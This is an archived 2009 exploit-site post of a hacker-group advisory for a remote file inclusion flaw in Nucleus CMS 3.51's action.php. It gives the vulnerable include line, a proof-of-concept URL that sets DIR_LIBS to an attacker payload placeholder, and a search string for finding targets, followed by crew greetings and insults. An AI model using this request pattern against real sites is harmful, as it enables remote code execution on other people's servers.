|    |    |    | Today: 24-Jun-2018 |

Nucleus CMS Remote File Include Vulnerability

December 8, 2009 | Posted in ExploitAlert

/**************************************************************************

[!] Nucleus CMS Remote File Include Vulnerability
[!] Author : Don Tukulesto (root@indonesiancoder.com)
[!] Homepage : http://www.indonesiancoder.com
[!] Date : November 30, 2009
[!] Tune In : http://antisecradio.fm (choose your weapon)

**************************************************************************/

[ Software Information ]

[+] Nucleus: PHP/MySQL Weblog CMS (http://nucleuscms.org/)
[+] Download : http://sourceforge.net/projects/nucleuscms/files/
[+] Version() : 3.51
[+] Nucleus allows you to easily maintain your own weblog(s) on your own server.
It offers a system that is easy to install, but still offers maximum flexibility.
[+] Method : Remote File Inclusion
[+] Dork : "Don Tukulesto is LAMMER"

===========================================================================

[ Vulnerable File ]

[+] action.php

Fatal error on line 25


include_once($DIR_LIBS . 'ACTION.php');
?>

[ Proof of Concept ]

http://127.0.0.1/action.php?DIR_LIBS=[INDONESIANCODER-666]

===========================================================================

[ Who The Hell Has Control of That Damn Smoke Machine ]

[~] INDONESIAN CODER TEAM - KILL-9 CREW - MainHack Brotherhood - ServerIsDown
[~] kaMtiEz, M3NW5, arianom, Contrex, tiw0L, Pathloader, abah_benu, Saint, Cyb3r_tr0n, M364TR0N, VycOd,
[~] Jack-, Yadoy666 + miya666, s4va, senot, Bayu5154, Gonzhack, Tucker, Ian Petrucii, Ronz & FeeLCoMz
[~] kecemplungkalen, DraCoola Multimedia, XNITRO, rey_cute, Awan Bejat, Plaque, Gh4mb4s and YOU!!

[ rm -rf yourself ]

[>] FOR MALINGSIAL


[ Note ]

[+] Rest In Peace R.T.O AKA SATAN BLASTED
[+] Thank you to ALL OF YOU called me piece of shit, especially for High school friends

Taged in: include, nucleus, Remote, vulnerability